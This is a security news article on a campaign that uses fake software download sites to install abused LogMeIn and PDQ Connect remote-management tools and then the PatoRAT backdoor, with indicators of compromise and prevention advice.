Cybercriminals Exploit RMM Tools LogMeIn and PDQ Connect to Deploy Malware Disguised as Legitimate Software
In a concerning development, cybercriminals are increasingly leveraging Remote Monitoring and Management (RMM) tools such as LogMeIn and PDQ Connect to distribute malware under the guise of legitimate software installations. This tactic enables attackers to gain unauthorized access to victims’ systems while evading detection by conventional security measures.
The Deceptive Strategy
The attack commences when unsuspecting users visit counterfeit websites that closely mimic official download pages for popular applications like Notepad++, 7-Zip, WinRAR, and even ChatGPT. These fraudulent sites offer downloads of seemingly authentic software installers. However, upon execution, these installers deploy modified versions of RMM tools—specifically LogMeIn Resolve or PDQ Connect—granting attackers full remote control over the compromised systems.
Execution and Control
Once the malicious RMM software is installed, attackers can execute PowerShell commands remotely to download and install additional malware. A notable payload in this campaign is PatoRAT, a backdoor developed in Delphi. PatoRAT exhibits several concerning capabilities:
– Data Collection: It gathers comprehensive information about the infected system, including computer name, username, operating system details, memory usage, screen resolution, and active windows.
– Remote Control: The malware supports functions such as mouse control, screen capture, keylogging, and the theft of browser passwords.
– Persistence: PatoRAT can install port-forwarding tools, facilitating sustained access to the compromised system.
Indicators of Compromise
Security researchers have identified specific company identification numbers embedded within the LogMeIn configuration files used in these attacks. The following company IDs have been associated with the malicious activity:
– 8347338797131280000
– 1995653637248070000
– 4586548334491120000
These identifiers suggest the involvement of multiple threat actors, each utilizing unique configurations to control infected systems.
Geographical Indicators
The presence of Portuguese-language strings within PatoRAT’s code indicates that the malware developers may originate from Portuguese-speaking regions. This linguistic clue provides insight into the potential geographic origin of the threat actors involved in this campaign.
Preventive Measures
To mitigate the risk of such attacks, users and organizations are advised to adopt the following security practices:
– Download from Official Sources: Always obtain software from official websites or trusted repositories to ensure authenticity.
– Verify Digital Certificates: Before executing downloaded files, check for valid digital signatures to confirm their legitimacy.
– Maintain Updated Security Software: Regularly update antivirus and anti-malware programs to detect and prevent the installation of malicious software.
– User Education: Educate users about the risks of downloading software from unverified sources and the importance of scrutinizing download links and websites.
Conclusion
The exploitation of legitimate RMM tools like LogMeIn and PDQ Connect by cybercriminals underscores the evolving nature of cyber threats. By disguising malware as routine software installations, attackers can infiltrate systems undetected, emphasizing the need for heightened vigilance and robust security measures in the digital landscape.
